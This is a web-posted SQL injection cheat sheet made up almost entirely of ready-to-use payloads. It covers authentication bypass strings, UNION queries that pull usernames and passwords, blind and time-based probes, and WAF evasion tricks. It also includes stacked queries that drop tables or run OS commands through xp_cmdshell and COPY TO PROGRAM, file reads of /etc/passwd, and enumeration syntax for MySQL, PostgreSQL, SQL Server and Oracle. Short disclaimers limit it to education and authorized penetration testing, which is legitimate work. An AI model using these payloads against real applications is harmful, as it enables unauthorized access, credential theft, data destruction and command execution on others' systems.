
SQL Injection Cheat Sheet
๐ง Basic SQL Injection
' OR '1'='1
' OR 1=1 --
" OR 1=1 --
' OR 'a'='a
') OR ('1'='1
๐ Authentication Bypass
' OR '1'='1' --
' OR '1'='1' /*
' OR 1=1#
admin' --
๐ UNION-Based SQL Injection
Find column count:
' ORDER BY 1--
' ORDER BY 2--
Using UNION:
' UNION SELECT null, null --
' UNION SELECT 1,2,3 --
' UNION SELECT username, password FROM users --
๐ฅ️ Error-Based SQL Injection
' AND 1=CONVERT(int, (SELECT @@version)) --
' AND 1=CAST((SELECT user()) AS int) --
๐งช Blind SQL Injection
' AND 1=1 -- (True)
' AND 1=2 -- (False)
' AND substring(@@version,1,1)='5' --
' AND ASCII(SUBSTRING((SELECT database()),1,1))=100 --
⏱️ Time-Based Blind SQL Injection
' OR IF(1=1, SLEEP(5), 0) --
(MySQL)'; IF (1=1) WAITFOR DELAY '0:0:5'--
(MSSQL)
๐ก️ WAF Bypass & Obfuscation
%27 OR %271%27=%271
(URL encoded)'/**/OR/**/'1'='1
' OR 1=1-- -
')/**/OR/**/(1=1)--
UN/**/ION SEL/**/ECT
๐ Extracting Data
' UNION SELECT table_name, null FROM information_schema.tables --
' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name='users' --
' UNION SELECT username, password FROM users --
๐ Useful Functions (MySQL)
database()
version()
user()
@@datadir
LOAD_FILE('/etc/passwd')
INFORMATION_SCHEMA.TABLES
๐ MySQL Comments & Tricks
--
(Comment)#
(Comment)/* comment */
' /*!UNION*/ SELECT
๐งฌ Stack Queries (MSSQL)
'; DROP TABLE users --
'; EXEC xp_cmdshell('whoami') --
๐ Bypass Filters
'OR'1'='1
'||(SELECT 1)=1
' AND CHAR(124)+CHAR(124)+(SELECT 1)=1
๐ Disclaimer
This cheat sheet is intended for educational purposes, penetration testing in authorized environments, and improving application security. Do not use these techniques on systems without explicit permission.
๐ SQL Injection Cheat Sheet by DBMS
Note: Syntax may vary depending on the database. Always tailor payloads to the specific backend.
๐ข️ MySQL
- Version:
SELECT @@version;
- Current User:
SELECT user();
- Current DB:
SELECT database();
- List DBs:
SELECT schema_name FROM information_schema.schemata;
- List Tables:
SELECT table_name FROM information_schema.tables WHERE table_schema='target_db';
- List Columns:
SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
- Read File:
SELECT LOAD_FILE('/etc/passwd');
- Time Delay:
SLEEP(5)
- Comment Syntax:
--
|#
|/* */
๐ PostgreSQL
- Version:
SELECT version();
- Current User:
SELECT current_user;
- Current DB:
SELECT current_database();
- List Tables:
SELECT table_name FROM information_schema.tables WHERE table_schema='public';
- List Columns:
SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
- Time Delay:
pg_sleep(5);
- Command Execution (with permissions):
COPY (SELECT '') TO PROGRAM 'id';
- Comment Syntax:
--
๐ฆพ Microsoft SQL Server
- Version:
SELECT @@version;
- Current User:
SELECT SYSTEM_USER;
- Current DB:
SELECT DB_NAME();
- List DBs:
SELECT name FROM master..sysdatabases;
- List Tables:
SELECT name FROM sysobjects WHERE xtype='U';
- Command Execution:
EXEC xp_cmdshell 'whoami';
- Time Delay:
WAITFOR DELAY '0:0:5';
- Comment Syntax:
--
|/* */
๐ถ Oracle
- Version:
SELECT * FROM v$version;
- Current User:
SELECT user FROM dual;
- Current DB:
SELECT ora_database_name FROM dual;
- List Tables:
SELECT table_name FROM all_tables;
- List Columns:
SELECT column_name FROM all_tab_columns WHERE table_name='TARGET_TABLE';
- Time Delay:
DBMS_LOCK.SLEEP(5);
- Command Execution:
Java procedures or external tables (if configured)
- Comment Syntax:
--
|/* */
๐งช Generic Injection Payloads
' OR '1'='1 --
' OR 1=1 --
' UNION SELECT null,null --
' AND 1=0 UNION SELECT username, password FROM users --
๐ก️ Filter Bypass Tricks
'/**/OR/**/'1'='1
UNION%0ASELECT
' OR 1=1-- -
CHAR(97)+CHAR(98)+CHAR(99)
(for 'abc')
⚠️ Disclaimer
This content is for educational and authorized penetration testing only. Do not attempt to exploit systems without proper legal consent.
0 Comments